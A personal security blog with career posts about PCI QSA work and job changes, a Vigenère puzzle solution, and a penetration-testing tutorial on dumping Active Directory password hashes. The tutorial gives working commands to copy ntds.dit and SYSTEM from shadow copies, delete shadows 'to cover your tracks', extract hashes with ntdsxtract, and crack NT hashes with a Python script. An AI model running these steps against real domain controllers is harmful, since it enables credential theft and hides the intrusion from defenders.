Thursday, June 22, 2017

PCI PA/P2PE certifications

Took the Payment Application (PA) Qualified Security Assessor (QSA) exam back in March, just a couple of weeks after taking the Point-to-Point Encryption (P2PE) QSA exam. Surprisingly, they both seemed like fairly easy tests; the P2PE was a little harder since I had to study up on some cryptography material.

Had been trying for a few months to assist with some P2PE assessment work, but that is not as easy as I had hoped. I asked to shadow some people or assist on small projects, but got nothing. I then asked to work on PA assessments, was invited out to the Colorado office to learn the internal processes and go over some documents, and was asked by the managing principal if I was interested in joining the PA team.

Finally decided to stop trying to get onto the P2PE team and took an opportunity on the PA team. I applied for a Senior Consultant position but was only transferred over as an IT Security Consultant. Not exactly sure what the holdup is with promoting me to Senior, especially since I have more experience than most of the Senior Consultants I have worked with so far. But that battle is for another day.

Will see how things go with the PA assessments; they do not seem to be very difficult, and most of the testing is easy. The pentesting portion is kind of a joke, as it only covers minor tests against SQLi, XSS, CSRF, and buffer overflows. It almost makes me miss doing pentesting and exploiting software vulnerabilities.



Wednesday, January 4, 2017

Starting off 2017 right! (I hope.....)

Well, it's 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling just about every week with multiple ROCs due weekly for my previous company. I never had enough time to actually do my job well, or even to think about fixing the issues we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss; I hope that changes a little soon. Working from home is a little weird, and I am not sure it is something I really like, since I miss the interactions with other people. Not that I do not like my family; it's just nice getting out of the house for a little while and talking to other people with similar interests. I will be trying to get former colleagues to do lunch once in a while, at least to keep up with what's going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. The first one is an ISO 27001 Lead Auditor certification course, so I will be heading to Colorado for a few days. The class was originally meant for junior associates who needed a certification to qualify them for their QSA; I asked if there was space for me to attend, and apparently there was. The second class is the PCI P2PE certification, which will be a little harder from my perspective, since most of my cryptography experience is military related and not really geared toward the commercial sector. If I pass that course, I have been asked whether I want to take the PA-DSS course and then possibly the PA-P2PE course. Since they need people to assist in that area, I said why not. I am always willing to take training classes; certifications never hurt anyone.

So it looks like the first full ROC I will lead is for a client they have had for a while. This should be a nice way to learn their methodology and show my manager I am able to do the work. I was brought in as a consultant, not a senior consultant. That was something I decided to do: I originally interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower-level one. I am sure some people are going "WTF, I would never do that." Well, I am more than capable of being a senior consultant, but if I come in as a junior-level person and can show that I am very good at my job, I will more than likely get a promotion, or possibly opportunities to do other things. Which is sort of what is happening already with the certification courses.

Well, 2017, let's hope things keep rolling along smoothly.....

Friday, December 2, 2016

ARCYBER Puzzle

A former colleague posted a cipher puzzle on a Slack channel I hang out on.

http://www.recruitahacker.net/Puzzle

I figured I would give it a try, since I like to do puzzles.
The site linked to an ARCYBER web site:


Looking at the cipher text, I was like, you have to be kidding me, this is too easy. So I ran it through a script I made a few years back to break Vigenère ciphers for another puzzle I had worked on.

While the script is not perfect, it was able to decode this cipher text.

Eexl fmoi! 
Well done!

Jabnh gsl'ze decbjrx lvtv, gsl uak hctf xyw gvltpj 
Since you're reading this, you may have the skills

inp mqrjzrlwzq bs awiz tjc Bvdq hpdu! 
and motivation to join the Army team

Pvirz mqpf esgie bwyi xofeprjec xiexzi nqtt ATAZFVJ.
Learn more about your potential future with ARCYBER.

KEY:
iamacybersoldier
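
Just to double check, decrypting with that key can be reproduced in a few lines of Python. This is only a minimal sketch of standard Vigenère decryption (not the solver script mentioned above, which also has to guess the key):

def vigenere_decrypt(ciphertext, key):
    # Standard Vigenere decryption: shift each letter back by the key letter,
    # advancing the key position only on alphabetic characters
    out = []
    ki = 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            shift = ord(key[ki % len(key)].lower()) - ord('a')
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return ''.join(out)

print(vigenere_decrypt('Eexl fmoi!', 'iamacybersoldier'))   # prints: Well done!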

So, putting the key into the website, you get the full response.


You get a link to email someone to let them know you solved the puzzle.



So I was like, sure, what could it hurt? I might get an offer to apply for some cool jobs with the government (not really).

The response to my email about solving the puzzle:

Congratulations on solving the puzzle and for your interest in the Army's cyber mission. We ask that you fill out a form found at http://www.goarmy.com/info/send1/?iom=GT45-FY16-ACNP-OT-XXX-XX-XXX-CP-XX-X-XXX   so we can continue discussions about how you can best fit into our Army's cyber professional workforce. We thank you for your inquiry and are committed to providing information as it becomes available. You may check out our website for the latest cyber career field updates at www.arcyber.army.mil.


v/r,
Mike Milord

Public Affairs Specialist
Army Cyber Command
8605 6th Armored Cavalry Road
Fort Meade, MD 20755
301-833-2007
michael.o.milord.civ@mail.mil

It takes you to the Army website to request information about joining.
I figure since I already have 24 years of service in the military they will not want me.

Tuesday, November 22, 2016

Moving from WordPress to Blogger Hassles

Have been attempting to move from WordPress to Blogger, and failing miserably at it.

There seem to be no useful tools still available that will parse the WordPress export into a usable file to import into Blogger. At one time there were several tools, and many sites, to assist with this. I guess those days are gone, and most are no longer available or working.

Downloaded several scripts that claim to convert the data to the correct format, and all of them have failed me. I tried some websites, and they all barf on me, complaining that my file is either in the wrong format or is too large.

So far I have moved one article over; with the many format changes needed, it took me about an hour to get it into a readable format.

Moving articles over one at a time is time consuming, so I guess I will only move the important ones over and trash the others.


Monday, September 26, 2016

Starting a new Job

I have left Sword & Shield to take a better opportunity with Coalfire Systems.
There were multiple reasons for leaving Sword & Shield, and most of them relate to one individual who has moved up the ranks in the company. He was originally hired to do report reviews five years back and is now the Senior VP of Services. Since his move into management there has been a drastic exodus of highly qualified personnel from the company. One major issue is that the CEO/President, Executive VP, and COO do not even seem to notice the main reason for the high personnel turnover.
Since I turned in my notice, the CEO and COO have completely ignored me. Walking down the hallway, I always say hello to everyone and usually get a hello back from whoever is there. Not lately; I have had multiple encounters with the C-suite, and they literally walk past me as if I were not there.
I wish all my former colleagues well in their endeavors and hope things get better.

Thursday, December 24, 2015

Splitting my time between 2 bosses

So my move over to the PCI QSA world has been extremely slow, primarily due to upper management. I am currently splitting my time between penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles: one gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well, since the latter does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customer doing PCI work. It usually never works out in my favor, and it makes for working long hours with no compensation for it.
My boss's boss (our COO) said that on Jan 1, 2016, I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The thing that makes this a pain is that they already hired a person to fill my spot on the team, but another person left in November, leaving another shortage. The interesting thing is that this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Friday, August 14, 2015

Getting Hashes From NTDS.dit File - Updated Version

Moved from my old Wordpress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.
Once you have access to a domain controller, the first step is to copy the needed files from an existing Volume Shadow Copy, or create a new one if needed. I generally prefer to create a new copy so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily, Windows has built-in tools to assist with collecting the needed files.
Vssadmin tool
List Volume Shadow Copies on the system:
C:\>vssadmin list shadows
Example: 'vssadmin list shadows' with no shadow copies available:
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\>vssadmin create shadow /for=C:
Example: 'vssadmin create shadow':
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:\'
 Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
 Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOWCOPY DISK>\windows\<directory>\<File> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above, the latest version is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry, just in case.
I have had a couple of times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
 vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes.
Utilities needed:
 • libesedb
 • ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
 [ -T table_name ] [ -hvV ] source 

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
 windows-932, windows-936, windows-1250, windows-1251,
 windows-1252 (default), windows-1253, windows-1254
 windows-1255, windows-1256, windows-1257 or windows-1258
 -h: shows this help
 -l: logs information about the exported items
 -m: export mode, option: all, tables (default)
 'all' exports all the tables or a single specified table with indexes,
 'tables' exports all the tables or a single specified table
 -t: specify the basename of the target directory to export to
 (default is the source filename) esedbexport will add the suffix
 .export to the basename
 -T: exports only a specific table
 -v: verbose output to stderr
 -V: print version
 Running esedbexport to extract the ntds.dit data:
 ./esedbexport -t <Directory to export data to> <ntds.dit file>
.export will be added to the end of the directory listed above

EXAMPLE:
 # ./esedbexport -t ~/ntds ~/ntds.dit
 esedbexport 20150409

Opening file.
 Exporting table 1 (MSysObjects) out of 11.
 Exporting table 2 (MSysObjectsShadow) out of 11.
 Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
 Exporting table 4 (datatable) out of 11.
 Exporting table 5 (link_table) out of 11.
 Exporting table 6 (hiddentable) out of 11.
 Exporting table 7 (sdproptable) out of 11.
 Exporting table 8 (sd_table) out of 11.
 Exporting table 9 (quota_table) out of 11.
 Exporting table 10 (quota_rebuild_progress_table) out of 11.
 Exporting table 11 (MSysDefrag1) out of 11.
 Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:
# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10
NTDSXtract:
http://www.ntdsxtract.com/
CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsusers.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user; the number of hashes will vary based on the domain's password history settings.)
Example Output in JTR Format:
 # python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP \
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

 [+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
 [+] Started with options:
 [-] Extracting password hashes
 [-] LM hash output filename: LM.out
 [-] NT hash output filename: NT.out
 [-] Hash output format: john The directory (/root/TEMP) specified does not exists!
 Would you like to create it? [Y/N] y
 [+] Initialising engine...
 [+] Loading saved map files (Stage 1)...
 [!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
 [+] Scanning database - 100% -> 40933 records processed
 [+] Sanity checks...
 Schema record id: 1481
 Schema type id: 10
 [+] Extracting schema information - 100% -> 4142 records processed
 [+] Loading saved map files (Stage 2)...
 [!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
 [+] Rebuilding maps...
 [+] Extracting object links...
 List of users:
 ==============
 (This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
 User name: FName LName
 User principal name: email@address.net
 SAM Account name: name
 SAM Account type: SAM_NORMAL_USER_ACCOUNT
 GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
 SID: S-1-5-21-350701555-3721294507-2303513147-3801
 When created: 2005-06-01 13:50:37
 When changed: 2013-12-12 15:08:12
 Account expires: Never
 Password last set: 2013-10-07 13:20:19.146593
 Last logon: 2013-12-11 18:35:10.166785
 Last logon timestamp: 2013-12-12 15:08:12.281517
 Bad password time 2013-12-11 00:04:52.446209
 Logon count: 6239
 Bad password count: 0
 User Account Control:
 NORMAL_ACCOUNT
 Ancestors:
 $ROOT_OBJECT$ local DOMAIN JOB Users FName LName
 Password hashes:
 name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
 name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need.... it is time to start cracking passwords to get to that data you wanted…
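
As a side note on why NT hashes fall so quickly: an NT hash is just the unsalted MD4 of the UTF-16LE encoded password. The sketch below is only an illustration of that check, assuming the pycryptodome package for MD4; in practice you would feed NT.out to John the Ripper or hashcat with a real wordlist.

from Crypto.Hash import MD4   # assumes pycryptodome is installed

def nt_hash(password):
    # NT hash = MD4 over the UTF-16LE encoding of the password (no salt)
    return MD4.new(password.encode('utf-16-le')).hexdigest()

def try_wordlist(target_hash, words):
    # Compare the target hash against the hash of every candidate word
    for word in words:
        if nt_hash(word) == target_hash.lower():
            return word
    return None

# Hypothetical example: the target hash is generated here for demonstration
target = nt_hash('Password1')
print(try_wordlist(target, ['letmein', 'Summer2015', 'Password1']))   # prints: Password1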